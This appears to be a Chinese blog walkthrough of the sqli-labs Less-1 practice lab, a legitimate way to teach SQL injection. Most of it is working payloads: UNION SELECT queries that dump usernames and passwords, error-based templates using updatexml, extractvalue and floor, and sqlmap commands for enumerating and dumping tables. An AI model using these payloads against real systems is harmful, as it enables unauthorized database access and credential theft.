sqli-labs(1)

最新推荐文章于 2024-04-11 22:32:24 发布
最新推荐文章于 2024-04-11 22:32:24 发布
阅读量172 收藏 1
点赞数
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jimggg/article/details/104906367
版权

Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)

一.字符型注入

首先测试一下 ’ 发现报错 然后 ''发现 不报错应该是字符注入
在这里插入图片描述测试 正常显示

http://192.168.1.21/sqli-labs-master/Less-1/?id=1' and 1=1 --+

在这里插入图片描述测试错误显示

http://192.168.1.21/sqli-labs-master/Less-1/?id=1’ and 1=2 --+

在这里插入图片描述列查询order by,发现是3。

http://192.168.1.21/sqli-labs-master/Less-1/?id=1‘ order by 4 --+
http://192.168.1.21/sqli-labs-master/Less-1/?id=1' order by 3 --+

在这里插入图片描述爆数据库名

http://192.168.1.21/sqli-labs-master/Less-1/?id=-1' union select 1,database(),3 --+ 
http://192.168.1.21/sqli-labs-master/Less-1/?id=-1' union select null,database(),null --+

(严谨一点,用null,方便伙伴们理解这里的参数)
注意一定要让id出错不存在,否则不会正常显示(我的理解,呵呵 )
在这里插入图片描述爆表名

http://192.168.1.21/sqli-labs-master/Less-1/?id=-1' union select null,group_concat(table_name),null from information_schema.tables where table_schema='security' --+

在这里插入图片描述

看到users,正常逻辑应该是用户名和密码之类的,爆列名

http://192.168.1.21/sqli-labs-master/Less-1/?id=-1' union select null,group_concat(column_name),null from information_schema.columns where table_name='users' --+

在这里插入图片描述
看到username,password,爆字段名

http://192.168.1.21/sqli-labs-master/Less-1/?id=-1' union select null, group_concat(username,0x7e,password),null from security.users --+

(0x7e是16进制的,用以间隔usernamepassword,当然还可以用别的)
在这里插入图片描述

## 二.基于报错的注入

1、通过floor报错
and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a)
注:输出字符长度限制为64个字符

2、通过updatexml报错
and updatexml(1,payload,1)
and updatexml(1,concat(0x7e,@@version,0x7e),1)注:输出字符有长度限制,最长32位

3、通过ExtractValue报错
and extractvalue(1, payload)
and extractv注:输出字符有长度限制,最长32位alue(1, concat(0x7e,@@version,0x7e))

第1题就不用这个方法了,后面还有64题,有不少要用到基于报错的注入

# 三.sqlmap自动注入

测试注入点
sqlmap -u ‘http://192.168.1.21/sqli-labs-master/Less-1/?id=1’
在这里插入图片描述
暴库
sqlmap -u ‘http://192.168.1.21/sqli-labs-master/Less-1/?id=1’ --dbs
在这里插入图片描述当前数据库
sqlmap -u ‘http://192.168.1.21/sqli-labs-master/Less-1/?id=1’ --current-db
在这里插入图片描述
当前数据库使用账户
sqlmap -u ‘http://192.168.1.21/sqli-labs-master/Less-1/?id=1’ --current-user
在这里插入图片描述列出sqlserver所有用户
sqlmap -u ‘http://192.168.1.21/sqli-labs-master/Less-1/?id=1’ --users
在这里插入图片描述数据库账户与密码
sqlmap -u ‘http://192.168.1.21/sqli-labs-master/Less-1/?id=1’ --passwords
hash值我就不转了哈,偷下懒,图太多了!
在这里插入图片描述列出数据库中的表

sqlmap -u ‘http://192.168.1.21/sqli-labs-master/Less-1/?id=1’ -D security --tables
在这里插入图片描述
列出表中字段

sqlmap -u ‘http://192.168.1.21/sqli-labs-master/Less-1/?id=1’ -D security -T users --columns
在这里插入图片描述暴字段内容
sqlmap -u ‘http://192.168.1.21/sqli-labs-master/Less-1/?id=1’ -D security -T users -C “id,username,password” --start 1 --stop 20 --dump
在这里插入图片描述今天先到这里吧,第一次发博,借用一位大神的话:“少就是多,慢就是快”,加油!!!

jimggg
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli - labs-1
m0_69548793的博客
07-05 384
sqli-1
sqli-labs第一关
weixin_69147946的博客
11-11 520
sqli-labs靶机笔记
入门练习(sqli-labs-1)
m0_60429427的博客
04-25 2501
sqli-labs第一关
Sqli-labs通关全解---关于Sqli-lab--1
cyynid的博客
01-10 547
靶场搭建
Sqli-Labs~1 详解
Cy610610的博客
12-04 1331
sqli-labs第一关,手把手教学,包学包会!内含informations_schema数据库解释说明等相关内容
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs靶场
最新发布
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs(php7.3以上可运行)
01-29
sqli-labs提供了多种级别的SQL注入练习,适合初学者到高级安全专家。每个级别都设计了一个具有不同安全漏洞的Web应用,用户可以通过尝试注入SQL语句来解密问题,从而深入理解SQL注入的各种技术和防御策略。 三、PHP...
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
SQLI-LABS 01.第一关 【显错注入_单引号闭合】
weixin_45284414的博客
05-15 536
首先主动输入一个单引号提前闭合,最后-- x注释掉后边内容。中间可以构造使用AND OR 拼接语句进行探测。01.第一关 【显错注入_单引号闭合】)利用常规的显错注入去做题。
SQLI-LABS(一)
weixin_51075988的博客
11-23 1356
SQLI-LABS (一) 学习前的准备: sql是什么? sql注入:在web应用程序事先定义好的查询语句结尾添加额外SQL语句, 欺骗数据库服务器执行非授权的任意查询,得到相应的数据信息,进行提权等; 2、搭建sqli-labs(可以使用phpstudy搭建); 3、学会在 mysql命令行 中进行 mysql的基本用法 ; mysql命令行的具体打开方法:找到\phpstudy_pro\extensions\mysql5.7.26\bin ,在Windows命令中进入bin中,输入"mysql -u
sqli-labs-1
m0_63190830的博客
06-30 209
sqli/less-1基础题
sqli-labs(1)
qq_61988806的博客
11-13 130
当id为1的时候回显正常通过‘发现报错,验证sql注入存在--+可以正常注释后面的内容,通过order by 查询有几列数据当查询4列的时候发现错误得到有3列的信息这里的id为-1,-1的数据不会存在给后面查询的1,2,3留下了显示位,正常为1时2,3的显示位为查询出的结果union select 联合查询找回显位置在2的位置替换为我们要查询的语句 database() 查询当前的数据库group_concat 用于将多个表名一起输出出来。
sqli-labs一第一关详细步骤,新手打基础篇
qq_50956249的博客
03-21 623
5、查出数据库名称后,爆破表名,union 1,group_concat(table_name),3,…union 1,2,group_concat(column_name),…7、查出了具体的字段名,最后一步就是查出具体的数据了,union 1,2,group _concat(username,id,password) from users–+4、先查出使用的是哪个数据库,用database()函数,以及数据库版本信息,用version()函数。输入1’–+,有用户显示。输入 1,有用户显示。
sqli-labs通关详解(1-20关)
2302_81105681的博客
04-11 3241
1.首先判断闭合方式在我之前发布的文章中有详细的sql注入判断闭合的方法和原理,参考《sql注入实验原理》在1-6关,我们可以通过在参数后面加\的方法判断闭合\后面的符号就是闭合符号,由此可见第一关的闭合方式为'闭合2.判断字段数当我们输入?id=1' order by 4--+时页面显示没有第4字段,由此判断字段数为3.3.判断回显位因为有三个字段,所以我们使用命令判断出第2,3字段的内容回显在页面中4.爆数据库名我们可以将2或者3更改为database()来使页面回显出数据库名。
sql-labs1
Braindance
02-28 340
前言 在线靶机地址:https://buuoj.cn/challenges#sqli-labs less-1 ​ 首先说明sql注入的大致步骤: 判断注入类型。如整型字符型注入等。 判断列数 判断数据的回显位 构造sql语句 ​ 根据题目提示,说明是一个单引号注入题目,构造一个带单引号的语句?id=1',发现数据库报错 ​ 通过后面的报错语句1'' LIMIT 0,1的分析,我们的单引号被数据库解析,那么说明我们也可以使用连接查询union插入我们想要查询的语句。 ​ 推出数据库的查询的部分语句可能.
sqli-labs 1~4关详解
qq_45756971的博客
10-15 495
点进去题目:提示我们输入题目id,第一题,所以我们输入?id=1,回车即可。如图:首先可以判断这里接受的是一个GET请求,先在1后面加一个’ 发现报错,说明这里没有过滤掉引号,所以这里是一个注入点 SQL注入通常有两种类型,整形注入和字符型注入,那么我们要判断这是哪种注入就要分析这里的报错语句,报错信息中共有5个单引号,"实际上是两个单引号,最外面的两个是报错信息的提示引号,'1’两边的引号是后台代码的引号,多出来的就是我们加上的,因为这里给输入的1加上了引号所以后台接受的是字符型,那么我们在后续的注入中需
sqli-labs 1
09-20
引用、和是一些关于SQL注入的链接,可以通过在URL中插入特定的语句来进行SQL注入攻击。SQL注入是一种常见的安全漏洞,允许攻击者通过在输入字段中插入恶意的SQL代码来绕过应用程序的身份验证和访问数据。然而,请注意,我不能为你提供有关如何进行SQL注入攻击的信息。这种行为是非法和不道德的,可能对他人造成伤害。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值